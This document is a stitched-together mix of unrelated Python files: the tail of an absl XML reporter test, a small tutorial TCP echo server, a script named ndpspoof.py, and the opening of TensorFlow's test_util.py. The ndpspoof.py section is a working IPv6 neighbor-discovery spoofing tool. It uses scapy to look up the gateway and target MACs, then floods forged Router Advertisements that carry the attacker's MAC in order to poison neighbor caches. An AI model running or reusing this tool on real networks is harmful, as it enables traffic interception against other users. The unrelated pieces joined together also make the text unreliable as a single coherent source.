unittest3_backport.TextTestResult,
'stopTest',
side_effect=lambda t: result.addFailure(t, self.get_sample_failure())):
# Run stopTest in a separate thread since we are looking to verify that
# it does not deadlock, and would otherwise prevent the test from
# completing.
stop_test_thread = threading.Thread(target=result.stopTest, args=(test,))
stop_test_thread.daemon = True
stop_test_thread.start()
stop_test_thread.join(10.0)
self.assertFalse(stop_test_thread.is_alive(),
'result.stopTest(test) call failed to complete')
class XMLTest(absltest.TestCase):
def test_escape_xml(self):
self.assertEqual(xml_reporter._escape_xml_attr('"Hi" <\'>\t\r\n'),
'"Hi" <'>	
')
class XmlReporterFixtureTest(absltest.TestCase):
def _run_test_and_get_xml(self, flag):
"""Runs xml_reporter_helper_test and returns an Element instance.
Runs xml_reporter_helper_test in a new process so that it can
exercise the entire test infrastructure, and easily test issues in
the test fixture.
Args:
flag: flag to pass to xml_reporter_helper_test
Returns:
The Element instance of the XML output.
"""
xml_fhandle, xml_fname = tempfile.mkstemp()
os.close(xml_fhandle)
try:
binary_name = 'absl/testing/tests/xml_reporter_helper_test'
args = [_bazelize_command.get_executable_path(binary_name),
flag, '--xml_output_file=%s' % xml_fname]
ret = subprocess.call(args)
self.assertNotEqual(ret, 0)
xml = ElementTree.parse(xml_fname).getroot()
finally:
os.remove(xml_fname)
return xml
def _run_test(self, flag, num_errors, num_failures, suites):
xml_fhandle, xml_fname = tempfile.mkstemp()
os.close(xml_fhandle)
try:
binary_name = 'absl/testing/tests/xml_reporter_helper_test'
args = [_bazelize_command.get_executable_path(binary_name),
flag, '--xml_output_file=%s' % xml_fname]
ret = subprocess.call(args)
self.assertNotEqual(ret, 0)
xml = ElementTree.parse(xml_fname).getroot()
logging.info('xml output is:\n%s', ElementTree.tostring(xml))
finally:
os.remove(xml_fname)
self.assertEqual(int(xml.attrib['errors']), num_errors)
self.assertEqual(int(xml.attrib['failures']), num_failures)
self.assertLen(xml, len(suites))
actual_suites = sorted(
xml.findall('testsuite'), key=lambda x: x.attrib['name'])
suites = sorted(suites, key=lambda x: x['name'])
for actual_suite, expected_suite in zip(actual_suites, suites):
self.assertEqual(actual_suite.attrib['name'], expected_suite['name'])
self.assertLen(actual_suite, len(expected_suite['cases']))
actual_cases = sorted(actual_suite.findall('testcase'),
key=lambda x: x.attrib['name'])
expected_cases = sorted(expected_suite['cases'], key=lambda x: x['name'])
for actual_case, expected_case in zip(actual_cases, expected_cases):
self.assertEqual(actual_case.attrib['name'], expected_case['name'])
self.assertEqual(actual_case.attrib['classname'],
expected_case['classname'])
if 'error' in expected_case:
actual_error = actual_case.find('error')
self.assertEqual(actual_error.attrib['message'],
expected_case['error'])
if 'failure' in expected_case:
actual_failure = actual_case.find('failure')
self.assertEqual(actual_failure.attrib['message'],
expected_case['failure'])
return xml
def _test_for_error(self, flag, message):
"""Run the test and look for an Error with the specified message."""
ret, xml = self._run_test_with_subprocess(flag)
self.assertNotEqual(ret, 0)
self.assertEqual(int(xml.attrib['errors']), 1)
self.assertEqual(int(xml.attrib['failures']), 0)
for msg in xml.iter('error'):
if msg.attrib['message'] == message:
break
else:
self.fail(msg='Did not find message: "%s" in xml\n%s' % (
message, ElementTree.tostring(xml)))
def _test_for_failure(self, flag, message):
"""Run the test and look for a Failure with the specified message."""
ret, xml = self._run_test_with_subprocess(flag)
self.assertNotEqual(ret, 0)
self.assertEqual(int(xml.attrib['errors']), 0)
self.assertEqual(int(xml.attrib['failures']), 1)
for msg in xml.iter('failure'):
if msg.attrib['message'] == message:
break
else:
self.fail(msg='Did not find message: "%s"' % message)
def test_set_up_module_error(self):
self._run_test(
flag='--set_up_module_error',
num_errors=1,
num_failures=0,
suites=[{'name': '__main__',
'cases': [{'name': 'setUpModule',
'classname': '__main__',
'error': 'setUpModule Errored!'}]}])
def test_tear_down_module_error(self):
self._run_test(
flag='--tear_down_module_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest'}]},
{'name': '__main__',
'cases': [{'name': 'tearDownModule',
'classname': '__main__',
'error': 'tearDownModule Errored!'}]}])
def test_set_up_class_error(self):
self._run_test(
flag='--set_up_class_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'setUpClass',
'classname': '__main__.FailableTest',
'error': 'setUpClass Errored!'}]}])
def test_tear_down_class_error(self):
self._run_test(
flag='--tear_down_class_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest'},
{'name': 'tearDownClass',
'classname': '__main__.FailableTest',
'error': 'tearDownClass Errored!'}]}])
def test_set_up_error(self):
self._run_test(
flag='--set_up_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'setUp Errored!'}]}])
def test_tear_down_error(self):
self._run_test(
flag='--tear_down_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'tearDown Errored!'}]}])
def test_test_error(self):
self._run_test(
flag='--test_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'test Errored!'}]}])
def test_set_up_failure(self):
if six.PY2:
# A failure in setUp() produces an error (not a failure), which is
# inconsistent with the Python unittest documentation. In Python
# 2.7, the bug appears to be in unittest.TestCase.run() method.
# Although it correctly checks for a SkipTest exception, it does
# not check for a failureException.
self._run_test(
flag='--set_up_fail',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'setUp Failed!'}]}])
else:
self._run_test(
flag='--set_up_fail',
num_errors=0,
num_failures=1,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'failure': 'setUp Failed!'}]}])
def test_tear_down_failure(self):
if six.PY2:
# See comment in test_set_up_failure().
self._run_test(
flag='--tear_down_fail',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'error': 'tearDown Failed!'}]}])
else:
self._run_test(
flag='--tear_down_fail',
num_errors=0,
num_failures=1,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'failure': 'tearDown Failed!'}]}])
def test_test_fail(self):
self._run_test(
flag='--test_fail',
num_errors=0,
num_failures=1,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest',
'failure': 'test Failed!'}]}])
if __name__ == '__main__':
absltest.main()
|
038_server.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Network programming - TCP request - server side
Purpose: take the string sent by the client, prepend "Hello" and return it to the client
'''
import socket, threading, time
# Create the socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the listening IP address and port:
s.bind(('127.0.0.1', 9999))
s.listen(5)
print('Waiting for connection...')
def tcplink(sock, addr):
print('Accept new connection from %s:%s...' % addr)
sock.send(b'Welcome!')
while True:
data = sock.recv(1024)
time.sleep(1)
if not data or data.decode('utf-8') == 'exit':
break
sock.send(('Hello, %s!' % data.decode('utf-8')).encode('utf-8'))
sock.close()
print('Connection from %s:%s closed.' % addr)
while True:
    # Accept a new connection:
sock, addr = s.accept()
    # Spawn a new thread to handle the TCP connection:
t = threading.Thread(target=tcplink, args=(sock, addr))
t.start()
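# A minimal client sketch for exercising this server (illustrative only, not
# part of the original script; host/port assumed to match the bind() above):
#
#   import socket
#   c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   c.connect(('127.0.0.1', 9999))
#   print(c.recv(1024).decode('utf-8'))   # 'Welcome!'
#   c.send(b'Alice')
#   print(c.recv(1024).decode('utf-8'))   # 'Hello, Alice!'
#   c.send(b'exit')
#   c.close()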
|
ndpspoof.py
|
from threading import Thread
from scapy.all import *
import netifaces as ni
stop = 1
def NDP_poison(target_ipv6, gateway_ipv6, target_mac, gateway_mac, host_mac, interface):
print("[*] NDP poisoning...")
try:
global stop
while stop:
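            # Flood the all-nodes multicast address (ff02::1) with Router
            # Advertisements that spoof the gateway's IPv6 source address but
            # carry this host's MAC in the source link-layer option, steering
            # victims' neighbor caches toward the attacker.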
ether = (Ether(dst='33:33:00:00:00:01', src=host_mac))
ipv6 = IPv6(src=gateway_ipv6, dst='ff02::1')
ra = ICMPv6ND_RA()
lla = ICMPv6NDOptSrcLLAddr(lladdr=host_mac)
            sendp(ether/ipv6/ra/lla, iface=interface, verbose=0)
except Exception as e:
print("[!!] Error while ndp spoofing: " + str(e))
finally:
        clean_up(target_ipv6, gateway_ipv6, target_mac, gateway_mac, interface)
print("[*] NDP poisoning has ended")
def clean_up(target_ipv6, gateway_ipv6, target_mac, gateway_mac, interface):
print("[*] Cleaning ndp cache...")
try:
ether = (Ether(dst='33:33:00:00:00:01', src=gateway_mac))
ipv6 = IPv6(src=gateway_ipv6, dst='ff02::1')
ra = ICMPv6ND_RA()
lla = ICMPv6NDOptSrcLLAddr(lladdr=gateway_mac)
        sendp(ether / ipv6 / ra / lla, iface=interface, verbose=0)
except Exception as e:
print("[!!] Error while cleaning up ndp: " + str(e))
def ndpspoof(target_ipv6, interface):
try:
if interface not in ni.interfaces():
print("No such network interface: " + interface)
exit(-1)
        host_ipv6 = ni.ifaddresses(interface)[ni.AF_INET6][-1]['addr'].replace('%'+interface, '')
host_mac = ni.ifaddresses(interface)[ni.AF_LINK][0]['addr']
gws = ni.gateways()
gateway_ipv6 = gws['default'][ni.AF_INET6][0]
print("[*] Getting MAC address of default gateway...")
        pkt = sr1(IPv6(dst=gateway_ipv6)/ICMPv6ND_NS(tgt=gateway_ipv6), iface=interface, verbose=0)
gateway_mac = pkt[ICMPv6NDOptDstLLAddr].lladdr
if gateway_mac is None:
print("[*] Could not get MAC address of default gateway")
exit(-1)
print("[*] Getting MAC address of target...")
        pkt = sr1(IPv6(dst=target_ipv6) / ICMPv6ND_NS(tgt=target_ipv6), iface=interface, verbose=0)
target_mac = pkt[ICMPv6NDOptDstLLAddr].lladdr
if target_mac is None:
print("[*] Could not get MAC address of target")
exit(-1)
print("\tHost IP: ", host_ipv6)
print("\tHost MAC: ", host_mac)
print("\tDefault gateway IP: ", gateway_ipv6)
print("\tDefault gateway MAC: ", gateway_mac)
print("\tTarget IP: ", target_ipv6)
print("\tTarget MAC: ", target_mac)
        ndp_poison = Thread(target=NDP_poison, args=(target_ipv6, gateway_ipv6, target_mac, gateway_mac, host_mac, interface))
ndp_poison.start()
except Exception as e:
print("[!!] Error while initializing ndpspoof: " + str(e))
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import unittest
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the above import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top
except ImportError:
pass
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
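  # Deletes string-valued node attributes that match the randomized sharded
  # checkpoint temp path, so otherwise-identical GraphDefs containing V2
  # checkpoint ops still compare as equal.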
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
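# Illustrative use of skip_if (hypothetical test method, not part of this module):
#
#   @skip_if(lambda: not gpu_device_name())
#   def testNeedsGpu(self):
#     ...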
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
"""
def decorator(self, **kwargs):
"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various versions
# of python2.7.x.
for _ in range(2):
f(self, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
      # In some cases (specifically on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert new_count <= previous_count, (
"new_count(%d) is not less than or equal to previous_count(%d)" %
(new_count, previous_count))
gc.enable()
return decorator
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, blacklist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(blacklist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in blacklist:
if b is obj:
return "<test code>"
if obj is blacklist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, blacklist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
blacklist: same as blacklist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, blacklist):
return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, blacklist):
"""Builds a reference graph as <referrer> -> <list of refferents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
blacklist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
blacklist = blacklist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, blacklist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, blacklist)
reprs[r_id] = describe(r, blacklist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
